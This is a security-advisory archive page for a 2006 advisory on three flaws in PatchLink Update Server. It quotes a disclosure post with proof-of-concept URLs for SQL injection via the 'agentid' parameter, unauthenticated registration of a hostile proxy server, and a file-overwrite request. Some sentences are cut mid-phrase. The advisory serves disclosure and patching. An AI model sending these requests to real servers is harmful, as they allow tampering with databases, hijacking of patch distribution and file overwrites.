SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   PatchLink Update Vendors:   PatchLink Corporation
PatchLink Update Bugs Let Remote Users Inject SQL Commands, Modify the Configuration, and Create or Overwrite Files
SecurityTracker Alert ID:  1016405
SecurityTracker URL:  http://securitytracker.com/id/1016405
CVE Reference:   CVE-2006-3425, CVE-2006-3426, CVE-2006-3430   (Links to External Site)
Updated:  Aug 12 2008
Original Entry Date:  Jun 29 2006
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 6.1, 6.2.0.181, 6.2.0.189
Description:   Several vulnerabilities were reported in PatchLink Update Server (PLUS). A remote user can inject SQL commands. A remote user may be able to inject packages into the PatchLink environment. A remote user can create or overwrite files on the target system.

The 'checkprofile.asp' script does not properly validate user-supplied input in the 'agentid' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. The SQL commands will run with 'PLUS ANONYMOUS' user privileges, where this user is part of the PLUS ADMINS database operator group.

The 'proxyreg.asp' script does not properly authenticate remote users. A remote user can invoke the script to list, add, and delete PatchLink Distribution Point (PDP) servers. A remote user can exploit this to proxy requests by a target PatchLink Update Agent for patches, which may allow the remote user to inject arbitrary packages into the PatchLink environment. Only the FastPatch product is affected. Systems that user SSL to encrypt agent-to-PLUS communications are not affected.

The 'nwupload.asp' script does not properly authenticate remote users. A remote user can create or overwrite files on the target system.

Novell ZENworks Patch Management 6.2 SR1 is also affected by these vulnerabilities.

Chris Steipp of Novacoast discovered this vulnerability.

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user may be able to inject packages into the PatchLink environment.

A remote user can create or overwrite files on the target system.

Solution:   The vendor has issued the following patches.

PatchLink Update Server (PLUS) for 6.1 P1

PatchLink Update Server (PLUS) for 6.2 SR1 P1

Vendor URL:  www.patchlink.com/ (Links to External Site)
Cause:   Authentication error, Input validation error
Underlying OS:  Windows (2000), Windows (2003)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Multiple Vulnerabilities in PatchLink Update


-------------------------------------------------------------
PatchLink Update Server 6 SQL Injection
-------------------------------------------------------------
Severity: Critical
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------

Synopsis
=====
Novacoast has discovered a vulnerability in the PatchLink Update
Server
(PLUS). This could allow the attacker to execute sql statements in the
PatchLink database as DBO.

Background
======

PatchLink Update* is the core product of the leading patch and
vulnerability
management solution for medium and large enterprise networks.

Discussion
======

There is an SQL injection vulnerability in the checkprofile.asp script.
This
unauthenticated script uses posted variables in an SQL call, which can
be
exploited.

An unchecked, posted variable (agentid) is used to create an SQL
statement.
ADMINS, and
the PLUS ADMINS group is dbo on the PLUS database) was the inserting
user.
Thus the database can be manipulated as DBO via this attack.

Affected Version
=========

PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1

Exploit
====

None required.

into the
ReportErrors table:

   
http://plus.company.org/dagent/checkprofile.asp?agentid=11111';%20INSERT
    %20INTO%20ReportErrors%20(ReportError_Description)%20VALUES%20
   ('something')--

Recommended Solution
=============

Apply Vendor Patch
    PatchLink:
        PatchLink Update Server (PLUS) for 6.2 SR1 P1
        PatchLink Update Server (PLUS) for 6.1 P1
    Novell: 
       
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm

Disclaimer
======
Novacoast accepts no liability or responsibility for the
content of this report, or for the consequences of any
actions taken on the basis of the information provided
within. Dissemination of this information is granted
provided it is presented in its entirety. Modifications
may not be made without the explicit permission of
Novacoast.




-------------------------------------------------------------
PatchLink Update Server 6 PDP Anonymous Access
-------------------------------------------------------------
Severity: Medium
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------

Synopsis
=====

Novacoast has discovered a vulnerability in the PatchLink Update
Server
(PLUS) Distribution Point Server Listing for PatchLink's FastPatch
application. Exploitation of this vulnerability could allow the
attacker to
proxy requests by PatchLink Update Agents for patches, and thus
possibly
inject arbitrary packages into the PatchLink environment.

Background
======

PatchLink Update* is the core product of the leading patch and
vulnerability
management solution for medium and large enterprise networks.

PatchLink Distribution Point and FastPatch technology provide
intelligent
distribution across the entire enterprise minimizing deployment speeds
and
bandwidth utilization across the wide area network.

Discussion
======

credentials when
PatchLink
FastPatch software, which allows roaming PatchLink agents to identify
proxy
servers on their network and connect to the closest or fastest
PatchLink
Distribution Point (PDP) automatically. The asp page returns a list of
PDP
servers in the organizations environment. An unauthenticated user can
list,
add, and remove PDP servers from this list.

This vulnerability would only affect organizations that use the
FastPatch
add-on product. Organizations that use SSL to protect their
agent-to-PLUS
communication will be unaffected by this attack.

Affected Version
=========

PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1

Exploit
====

None required.

1) To list all Proxy servers use:

    http://plus.company.org/dagent/proxyreg.asp?List=

    Use username/password of null/null for authentication.

2) To add a new Proxy server, use:

http://plus.company.org/dagent/proxyreg.asp?Proxy=www.hostileproxy.com:1337

3) To delete a Proxy server, use:

    http://plus.company.org/dagent/proxyreg.asp?Delete=pdp1.company.org


Recommended Solution
=============

1) Apply Vendor Patch
    PatchLink:
        PatchLink Update Server (PLUS) for 6.2 SR1 P1
        PatchLink Update Server (PLUS) for 6.1 P1
    Novell: 
       
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm

2) Workaround
    Deploy SSL certificate authentication to secure traffic between
agents
    and PLUS.


Disclaimer
======
Novacoast accepts no liability or responsibility for the
content of this report, or for the consequences of any
actions taken on the basis of the information provided
within. Dissemination of this information is granted
provided it is presented in its entirety. Modifications
may not be made without the explicit permission of
Novacoast.




-------------------------------------------------------------
PatchLink Update Server 6 File Overwrite
-------------------------------------------------------------
Severity: Medium
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)
-------------------------------------------------------------

Synopsis
=====
Novacoast has discovered a vulnerability in the PatchLink Update
Server
(PLUS). This could allow the attacker to write or overwrite files on
the
PLUS filesystem.

Background
======

PatchLink Update* is the core product of the leading patch and
vulnerability
management solution for medium and large enterprise networks. 

Discussion
======

and
 (who is
a member of "PLUS ADMINS" Windows group by default).  No validation
checks
are performed to prevent directory traversal.

The application nwupload.asp writes a file into directories defined by
variables passed to the page, appended to a registry key value. By
default,
on a Windows 2003 server, the registry key points to:
directory
traversals are not checked for, it is possible to write to any folder
on the
PLUS that PLUS ANONYMOUS (or thus, the PLUS ADMINS group) has access
to.

Affected Version
=========

PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1
Novell ZENworks Patch Management 6.2. SR1

Exploit
====

None required.

1) An attacker can run:
   
http://plus.company.org/dagent/nwupload.asp?action=one&agentid=two&data=
    thisiscool&index=1

This will first delete the folder at:
    {regkey for storage directory}\one\two

then create the directory:
     {regkey for storage directory}\one\two

then write the file:
    {regkey for storage directory}\one\two\1.txt

The file 1.txt will have the contents of the "data" variable.

Recommended Solution
=============

Apply Vendor Patch
    PatchLink:
        PatchLink Update Server (PLUS) for 6.2 SR1 P1
        PatchLink Update Server (PLUS) for 6.1 P1
    Novell: 
       
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm

Disclaimer
======
Novacoast accepts no liability or responsibility for the
content of this report, or for the consequences of any
actions taken on the basis of the information provided
within. Dissemination of this information is granted
provided it is presented in its entirety. Modifications
may not be made without the explicit permission of
Novacoast.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC